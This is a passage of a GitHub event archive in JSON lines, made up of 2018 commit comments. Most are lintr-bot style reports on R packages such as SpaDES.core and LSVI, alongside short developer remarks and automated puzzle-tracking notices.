superfluous.**\n```r\n​\n^\n```\n[R/module-repository.R:402:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/module-repository.R#L402) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/moduleMetadata.R:72:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/moduleMetadata.R#L72) *style:* **Commented code should be removed.**\n```r\n​    #metadata <- eval(parse(text = x)) # can't be used because can't evaluate start(sim)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:78:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/plotting-diagrams.R#L78) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- tail(completed(sim), n)\n    ^~\n```\n[R/plotting-diagrams.R:173:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/plotting-diagrams.R#L173) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​        sapply(ll, NROW) %>% sum() %>% `*`(., 26L)\n                         ~~^\n```\n[R/plotting-diagrams.R:325:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/plotting-diagrams.R#L325) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      PlotRemovingDots <- function(modDia, plotFn, axes, ...,\n      ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:326:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/plotting-diagrams.R#L326) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.color,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:327:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/plotting-diagrams.R#L327) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size,\n                                   ^~~~~~~~~~~\n```\n[R/plotting-diagrams.R:328:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/plotting-diagrams.R#L328) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size2,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:329:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/plotting-diagrams.R#L329) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.shape,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:330:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/plotting-diagrams.R#L330) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.cex,\n                                   ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:331:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/plotting-diagrams.R#L331) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.family,\n                                   ^~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:345:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/plotting-diagrams.R#L345) *style:* **Lines should not be more than 100 characters.**\n```r\n​          c(nchar(namesModDia)^0.8 * 10) # use exponential to stretch out, and multiplication to make all bigger\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting.R:6:31:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                              ^~~~~~~~\n```\n[R/plotting.R:6:41:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                                        ^~~~~~~~~~\n```\n[R/plotting.R:37:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                        ^~~~~~~~\n```\n[R/plotting.R:37:35:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                                  ^~~~~~~~~~\n```\n[R/plotting.R:86:22:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                    ~^~\n```\n[R/plotting.R:86:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                                                      ~^~\n```\n[R/plotting.R:87:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n          ~^~\n```\n[R/plotting.R:87:40:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                      ~^~\n```\n[R/plotting.R:87:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                                                        ~^~\n```\n[R/POM.R:128:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/POM.R#L128) *style:* **Lines should not be more than 100 characters.**\n```r\n​#' @param objFnCompare Character string. Either, \"MAD\" or \"RMSE\" indicating that inside the objective\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:186:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/POM.R#L186) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​           NaNRetries = NA, logObjFnVals = FALSE, weights, useLog = FALSE) {\n           ^~~~~~~~~~\n```\n[R/POM.R:196:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/POM.R#L196) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        NaNRetries, logObjFnVals, weights, useLog) {\n                        ^~~~~~~~~~\n```\n[R/POM.R:213:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/POM.R#L213) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (is.na(NaNRetries)) NaNRetries <- 1\n                           ^~~~~~~~~~\n```\n[R/POM.R:237:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/POM.R#L237) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​          sim_ <- Copy(sim)\n          ^~~~\n```\n[R/POM.R:255:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/POM.R#L255) *style:* **Put spaces around all infix operators.**\n```r\n​          envPOMCalled <- sys.frame(min(grep(\"POM\", sys.calls()))-1)\n                                                                ~^~\n```\n[R/POM.R:322:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/POM.R#L322) *style:* **Lines should not be more than 100 characters.**\n```r\n​          cat(format(unlist(lapply(objectiveRes, function(x) x[[\"value\"]])), digits = 4), dep = \"\\t\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:360:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fe0c4c1981c4527bfefa4e5701f8dad30bc593ad/R/POM.R#L360) *style:* **Lines should not be more than 100 characters.**\n```r\n​      par[whP] <- unlist(deps[[modName]]@parameters$default[deps[[modName]]@parameters$paramName == names(P(sim, modName)[whParamsByMod[whP]])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n"}},"created_at":"2018-07-18T15:36:53Z"}
{"id":"7983795126","type":"CommitCommentEvent","actor":{"login":"sunliangliang9201"},"repo":{"name":"sunliangliang9201/python_learn"},"payload":{"comment":{"id":29751655,"position":null,"line":null,"path":null,"commit_id":"094988272116d7823f31da32454a921dfcb91a69","created_at":"2018-07-18T15:37:41Z","updated_at":"2018-07-18T15:37:41Z","author_association":"OWNER","body":"132"}},"created_at":"2018-07-18T15:37:41Z"}
{"id":"7983800000","type":"CommitCommentEvent","actor":{"login":"vincentdchan"},"repo":{"name":"v2land/v2land-redstone"},"payload":{"comment":{"id":29751661,"position":4,"line":11,"path":"api/policies/isLoggedIn.js","commit_id":"a1f54ef3b7f0214051ecdfabf5cdadfa2d96b241","created_at":"2018-07-18T15:38:24Z","updated_at":"2018-07-18T15:38:24Z","author_association":"CONTRIBUTOR","body":"@incrediblink req.session 可能为 undefined，这个在服务器爆了千年的 bug 居然没人修"}},"created_at":"2018-07-18T15:38:24Z"}
{"id":"7983805710","type":"CommitCommentEvent","actor":{"login":"henderukurniawan"},"repo":{"name":"quqianghao/lcd12864-avr"},"payload":{"comment":{"id":29751668,"position":null,"line":null,"path":null,"commit_id":"0d9cefd4310a676b9d7dc3f2b873b98e0d1d27d4","created_at":"2018-07-18T15:39:19Z","updated_at":"2018-07-18T15:39:19Z","author_association":"NONE","body":"sorry where is the code? noob in github\r\n"}},"created_at":"2018-07-18T15:39:19Z"}
{"id":"7983807459","type":"CommitCommentEvent","actor":{"login":"hbenl"},"repo":{"name":"hbenl/vscode-jasmine-test-adapter"},"payload":{"comment":{"id":29751671,"position":15,"line":14,"path":"src/worker/loadTests.ts","commit_id":"6296cabbb3a7eedf8a113c90e088dfdfabdcc9fb","created_at":"2018-07-18T15:39:37Z","updated_at":"2018-07-18T15:39:37Z","author_association":"OWNER","body":"Done."}},"created_at":"2018-07-18T15:39:37Z"}
{"id":"7983813449","type":"CommitCommentEvent","actor":{"login":"SaFaGo"},"repo":{"name":"Ahmed-ShawkyEgy/Iris-dataset"},"payload":{"comment":{"id":29751682,"position":null,"line":null,"path":null,"commit_id":"f27bd0a7254c61b121c92b57c844f5d30299cfcf","created_at":"2018-07-18T15:40:34Z","updated_at":"2018-07-18T15:40:34Z","author_association":"NONE","body":"can you send me your number please."}},"created_at":"2018-07-18T15:40:34Z"}
{"id":"7983813708","type":"CommitCommentEvent","actor":{"login":"FaigerSYS"},"repo":{"name":"FaigerSYS/AntiToolbox"},"payload":{"comment":{"id":29751683,"position":null,"line":null,"path":null,"commit_id":"a85e3755a7d3254be533ab445fd15780b3686ab5","created_at":"2018-07-18T15:40:36Z","updated_at":"2018-07-18T15:40:36Z","author_association":"OWNER","body":"@robske110 Besides it is not exactly an anti-cheat plugin. It is something else, that just does not allows to play using specific clients"}},"created_at":"2018-07-18T15:40:36Z"}
{"id":"7983813919","type":"CommitCommentEvent","actor":{"login":"sebastiandonastor"},"repo":{"name":"sebastiandonastor/cycleme_sistema_anuncios"},"payload":{"comment":{"id":29751684,"position":null,"line":null,"path":null,"commit_id":"b45f97d1431ad6fa1bf93d582f6121e18eea5cbe","created_at":"2018-07-18T15:40:38Z","updated_at":"2018-07-18T15:40:38Z","author_association":"OWNER","body":"Excellent!"}},"created_at":"2018-07-18T15:40:38Z"}
{"id":"7983822799","type":"CommitCommentEvent","actor":{"login":"ReKTDevlol"},"repo":{"name":"ReKTDevlol/MonmusuBot"},"payload":{"comment":{"id":29751708,"position":null,"line":null,"path":null,"commit_id":"f8368e5ccb13c0fecbab56692e35c4e39cd36a34","created_at":"2018-07-18T15:42:00Z","updated_at":"2018-07-18T15:42:00Z","author_association":"OWNER","body":"Was already reset, GitHub didn't ignore when it was already in gitignore a thousand times"}},"created_at":"2018-07-18T15:42:00Z"}
{"id":"7983822861","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29751709,"position":null,"line":null,"path":null,"commit_id":"5f256539dc043caa03fce8f250ba7e52b95b6122","created_at":"2018-07-18T15:42:01Z","updated_at":"2018-07-18T15:42:01Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [implementd](https://implementd-static-docs.pantheonsite.io/docs) Multidev environment:\n- [.circleci/config.yml](https://github.com/pantheon-systems/documentation/commit/5f256539dc043caa03fce8f250ba7e52b95b6122/.circleci/config.yml)\n"}},"created_at":"2018-07-18T15:42:01Z"}
{"id":"7983823027","type":"CommitCommentEvent","actor":{"login":"SEWiedner"},"repo":{"name":"SEWiedner/PremiumCapacity-SuperUser"},"payload":{"comment":{"id":29751710,"position":null,"line":null,"path":null,"commit_id":"3eba1c0dda344528ed6bbafcdf97271182d81657","created_at":"2018-07-18T15:42:03Z","updated_at":"2018-07-18T15:42:03Z","author_association":"OWNER","body":"Added Date\r\n[PowerBI_DeptWorkSpaces.docx](https://github.com/SEWiedner/PremiumCapacity-SuperUser/files/2206409/PowerBI_DeptWorkSpaces.docx)\r\n"}},"created_at":"2018-07-18T15:42:03Z"}
{"id":"7983824198","type":"CommitCommentEvent","actor":{"login":"OliviaZhi"},"repo":{"name":"MLJejuCamp2017/DRL_based_SelfDrivingCarControl"},"payload":{"comment":{"id":29751715,"position":null,"line":null,"path":null,"commit_id":"c81b831bf59675a0607a62d032f76bec8c3648f6","created_at":"2018-07-18T15:42:14Z","updated_at":"2018-07-18T15:42:14Z","author_association":"NONE","body":"Thanks.\r\nIn your slides 31, how do you produce the Result Graph? i.e., how do you calculate your average reward?\r\n(In my training process, the score does not consistently increase with episode number and some score even drops a LOT...)\r\nI'm not sure what's going on here...\r\n[e.g.1.pdf](https://github.com/MLJejuCamp2017/DRL_based_SelfDrivingCarControl/files/2206410/e.g.1.pdf)\r\n"}},"created_at":"2018-07-18T15:42:14Z"}
{"id":"7983829426","type":"CommitCommentEvent","actor":{"login":"suyogkawale"},"repo":{"name":"suyogkawale/datasciencecoursera"},"payload":{"comment":{"id":29751725,"position":null,"line":null,"path":null,"commit_id":"fdd2db2685946d0318a1c018a6666a4efa2f3ed3","created_at":"2018-07-18T15:43:05Z","updated_at":"2018-07-18T15:43:05Z","author_association":"OWNER","body":"##This is a markdown file"}},"created_at":"2018-07-18T15:43:05Z"}
{"id":"7983830801","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"php-coder/mystamps"},"payload":{"comment":{"id":29751729,"position":null,"line":null,"path":null,"commit_id":"cf895bbb856b7925ee21a427834df773848ef730","created_at":"2018-07-18T15:43:17Z","updated_at":"2018-07-18T15:43:17Z","author_association":"COLLABORATOR","body":"Puzzle `702-afcf43b4` disappeared from [`src/test/java/ru/mystamps/web/service/TestObjects.java`](https://github.com/php-coder/mystamps/blob/master/src/test/java/ru/mystamps/web/service/TestObjects.java), that's why I closed #738. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-18T15:43:17Z"}
{"id":"7983830948","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"php-coder/mystamps"},"payload":{"comment":{"id":29751730,"position":null,"line":null,"path":null,"commit_id":"cf895bbb856b7925ee21a427834df773848ef730","created_at":"2018-07-18T15:43:19Z","updated_at":"2018-07-18T15:43:19Z","author_association":"COLLABORATOR","body":"Puzzle `477-49c1b317` disappeared from [`src/main/java/ru/mystamps/web/service/SeriesService.java`](https://github.com/php-coder/mystamps/blob/master/src/main/java/ru/mystamps/web/service/SeriesService.java), that's why I closed #878. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-18T15:43:19Z"}
{"id":"7983831053","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"php-coder/mystamps"},"payload":{"comment":{"id":29751731,"position":null,"line":null,"path":null,"commit_id":"cf895bbb856b7925ee21a427834df773848ef730","created_at":"2018-07-18T15:43:19Z","updated_at":"2018-07-18T15:43:19Z","author_association":"COLLABORATOR","body":"Puzzle `477-71df5fd9` disappeared from [`src/main/java/ru/mystamps/web/service/SeriesService.java`](https://github.com/php-coder/mystamps/blob/master/src/main/java/ru/mystamps/web/service/SeriesService.java), that's why I closed #879. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-18T15:43:19Z"}
{"id":"7983831167","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"php-coder/mystamps"},"payload":{"comment":{"id":29751732,"position":null,"line":null,"path":null,"commit_id":"cf895bbb856b7925ee21a427834df773848ef730","created_at":"2018-07-18T15:43:21Z","updated_at":"2018-07-18T15:43:21Z","author_association":"COLLABORATOR","body":"Puzzle `857-cbb24247` disappeared from [`src/main/java/ru/mystamps/web/service/TransactionParticipantServiceImpl.java`](https://github.com/php-coder/mystamps/blob/master/src/main/java/ru/mystamps/web/service/TransactionParticipantServiceImpl.java), that's why I closed #921. Please, remember that the puzzle was not necessarily removed in this particular commit. Maybe it happened earlier, but we discovered this fact only now."}},"created_at":"2018-07-18T15:43:21Z"}
{"id":"7983832869","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29751736,"position":null,"line":null,"path":null,"commit_id":"43f2b3a8a79dc913538903b6439c1ea34964436e","created_at":"2018-07-18T15:43:36Z","updated_at":"2018-07-18T15:43:36Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-418](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-418).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-418-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-18T15:43:36Z"}
{"id":"7983832937","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"php-coder/mystamps"},"payload":{"comment":{"id":29751737,"position":null,"line":null,"path":null,"commit_id":"cf895bbb856b7925ee21a427834df773848ef730","created_at":"2018-07-18T15:43:37Z","updated_at":"2018-07-18T15:43:37Z","author_association":"COLLABORATOR","body":"Puzzle `738-13880c1a` discovered in   [`src/test/java/ru/mystamps/web/tests/Random.java`](  https://github.com/php-coder/mystamps/blob/master/src/test/java/ru/mystamps/web/tests/Random.java)   and submitted as #926. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-18T15:43:37Z"}
{"id":"7983833224","type":"CommitCommentEvent","actor":{"login":"rajudev"},"repo":{"name":"Manas-kashyap/mate-desktop.org"},"payload":{"comment":{"id":29751738,"position":null,"line":null,"path":null,"commit_id":"837cdc58f83189d02d943bc38b7153b9f15ac7c2","created_at":"2018-07-18T15:43:40Z","updated_at":"2018-07-18T15:43:40Z","author_association":"NONE","body":"Please follow the alphabetic order of list. \r\nadd Hamara Sugam before Linux Mint and after GNU Guix"}},"created_at":"2018-07-18T15:43:40Z"}
{"id":"7983834065","type":"CommitCommentEvent","actor":{"login":"beretta42"},"repo":{"name":"EtchedPixels/FUZIX"},"payload":{"comment":{"id":29751740,"position":null,"line":null,"path":null,"commit_id":"cc34cdf9d58d2466fa650f69f9bc5769885b6943","created_at":"2018-07-18T15:43:48Z","updated_at":"2018-07-18T15:43:48Z","author_association":"CONTRIBUTOR","body":"Congrats!"}},"created_at":"2018-07-18T15:43:48Z"}
{"id":"7983837640","type":"CommitCommentEvent","actor":{"login":"simevo"},"repo":{"name":"simevo/fatturapa-magento"},"payload":{"comment":{"id":29751748,"position":13,"line":30,"path":"magento_module_1x/Efatt/app/code/local/Efatt/Module/controllers/Adminhtml/Sales/InvoiceController.php","commit_id":"75cd83d7eedeef5070d8c16f09c80bebef3c319f","created_at":"2018-07-18T15:44:21Z","updated_at":"2018-07-18T15:44:21Z","author_association":"OWNER","body":"not good"}},"created_at":"2018-07-18T15:44:21Z"}
{"id":"7983843327","type":"CommitCommentEvent","actor":{"login":"JoaoVFG"},"repo":{"name":"JoaoVFG/sysrlog"},"payload":{"comment":{"id":29751761,"position":null,"line":null,"path":null,"commit_id":"e9c8d8eb1625f8cc2f126886eec04115a5e2e5a2","created_at":"2018-07-18T15:45:17Z","updated_at":"2018-07-18T15:45:17Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [027 - Implementar Classe CalculaDistancia](https://trello.com/c/Che6Z6Rf/35-027-implementar-classe-calculadistancia)"}},"created_at":"2018-07-18T15:45:17Z"}
{"id":"7983845209","type":"CommitCommentEvent","actor":{"login":"gletthereblight"},"repo":{"name":"gletthereblight/leetcode"},"payload":{"comment":{"id":29751772,"position":null,"line":null,"path":null,"commit_id":"6fb9d9bf10fce3b385dd84f95482e99f29928b90","created_at":"2018-07-18T15:45:34Z","updated_at":"2018-07-18T15:45:34Z","author_association":"OWNER","body":"readme"}},"created_at":"2018-07-18T15:45:34Z"}
{"id":"7983848484","type":"CommitCommentEvent","actor":{"login":"Begasus"},"repo":{"name":"haikuports/haikuports"},"payload":{"comment":{"id":29751780,"position":null,"line":null,"path":null,"commit_id":"a073b38c27d6e111313a1fec3ae4659e55cc27d5","created_at":"2018-07-18T15:46:06Z","updated_at":"2018-07-18T15:46:06Z","author_association":"CONTRIBUTOR","body":"On that note ... there are ancient patches still valid where there hasn't been an upstream patch accepted or filed, what about those?"}},"created_at":"2018-07-18T15:46:06Z"}
{"id":"7983850533","type":"CommitCommentEvent","actor":{"login":"karussell"},"repo":{"name":"graphhopper/graphhopper"},"payload":{"comment":{"id":29751787,"position":31,"line":502,"path":"api/src/main/java/com/graphhopper/util/PointList.java","commit_id":"2f9838ba3e9601b1df0163c04a4f910849834d8b","created_at":"2018-07-18T15:46:24Z","updated_at":"2018-07-18T15:46:24Z","author_association":"MEMBER","body":"The question is what should shallow.copy return? Again a shallow list or a deep copy? The tests assume a deep copy so I kept it with this workaround."}},"created_at":"2018-07-18T15:46:24Z"}
{"id":"7983852244","type":"CommitCommentEvent","actor":{"login":"briri"},"repo":{"name":"DMPRoadmap/roadmap"},"payload":{"comment":{"id":29751790,"position":null,"line":null,"path":null,"commit_id":"75baa827ef746d480a928de54191cba7df61a05e","created_at":"2018-07-18T15:46:41Z","updated_at":"2018-07-18T15:46:41Z","author_association":"CONTRIBUTOR","body":"Hmm. So we use the FlagShiTzu gem to manage the bitflag for this field. Technically the value would always be > 0. The message though should probably say that the 'Permission level cannot be blank' or something like that. Roles are assigned in 3 ways. \r\n1. When the plan is created the user automatically gets 15 (creator + administrator + editor + commenter). \r\n2. When the user requests feedback on the plan share tab all org admins (for the user's org) get 24 (commenter + reviewer)\r\n3. When the user adds a collaborator to their plan on the Plan share tab that user gets one of the following: 8 (commenter aka readonly), 12 (commenter + editor) or 14 (administrator + editor + commenter aka co-owner)"}},"created_at":"2018-07-18T15:46:41Z"}
{"id":"7983853261","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"inbo/LSVI"},"payload":{"comment":{"id":29751792,"position":null,"line":null,"path":null,"commit_id":"f2924978a1783c1fd484c2564c433c47b8589343","created_at":"2018-07-18T15:46:51Z","updated_at":"2018-07-18T15:46:51Z","author_association":"NONE","body":"[R/berekenLSVIbasis.R:337:10:](https://github.com/inbo/LSVI/blob/f2924978a1783c1fd484c2564c433c47b8589343/R/berekenLSVIbasis.R#L337) *style:* **Commented code should be removed.**\n```r\n<U+200B>        #Index_min_min < 0\n         ^~~~~~~~~~~~~~~~~\n```\n[R/combinerenVerschilscore.R:35:6:](https://github.com/inbo/LSVI/blob/f2924978a1783c1fd484c2564c433c47b8589343/R/combinerenVerschilscore.R#L35) *warning:* **local variable '%max%' assigned but may not be used**\n```r\n<U+200B>    `%max%` <- function(a, b) max(a, b)\n     ^~~~~\n```\n[R/combinerenVerschilscore.R:36:6:](https://github.com/inbo/LSVI/blob/f2924978a1783c1fd484c2564c433c47b8589343/R/combinerenVerschilscore.R#L36) *warning:* **local variable '%min%' assigned but may not be used**\n```r\n<U+200B>    `%min%` <- function(a, b) min(a, b)\n     ^~~~~\n```\n[R/combinerenVoorwaarden.R:31:1:](https://github.com/inbo/LSVI/blob/f2924978a1783c1fd484c2564c433c47b8589343/R/combinerenVoorwaarden.R#L31) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #nog testen of Formule bestaat uit EN, OF, haakjes en VoorwaardeID's (en evt. andere tekens die logische berekening toelaten)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/deselecteerKenmerkenInOpname.R:45:1:](https://github.com/inbo/LSVI/blob/f2924978a1783c1fd484c2564c433c47b8589343/R/deselecteerKenmerkenInOpname.R#L45) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>      #Hier moet nog toegevoegd worden dat ofwel de soorten, ofwel de subsoorten gewist moeten worden al naargelang de soorten zelf in de kenmerkenlijst staan (zie berekenAantalSoorten en selecteerSoortenInOpname)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_soortenKenmerken.R:118:1:](https://github.com/inbo/LSVI/blob/f2924978a1783c1fd484c2564c433c47b8589343/R/invoercontroleData_soortenKenmerken.R#L118) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    Kenmerken <- Data_soortenKenmerken #naamsverandering is omdat code verplaatst is\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_soortenKenmerken.R:131:1:](https://github.com/inbo/LSVI/blob/f2924978a1783c1fd484c2564c433c47b8589343/R/invoercontroleData_soortenKenmerken.R#L131) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #onderstaande code mag weg zodra Gert deze Canonicalname toegevoegd heeft aan de databank\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:47:1:](https://github.com/inbo/LSVI/blob/f2924978a1783c1fd484c2564c433c47b8589343/R/invoercontroleData_voorwaarden.R#L47) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #misschien best ook testen dat die indicator-criterium-combinatie in de databank voorkomt?  En of deze voor dat habitattype voorkomt, maar dat best verderop doen\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/invoercontroleData_voorwaarden.R:48:1:](https://github.com/inbo/LSVI/blob/f2924978a1783c1fd484c2564c433c47b8589343/R/invoercontroleData_voorwaarden.R#L48) *style:* **lines should not be more than 80 characters.**\n```r\n<U+200B>    #Voorwaarde ook verplichten?  Anders wel testen of het ok is als het aanwezig 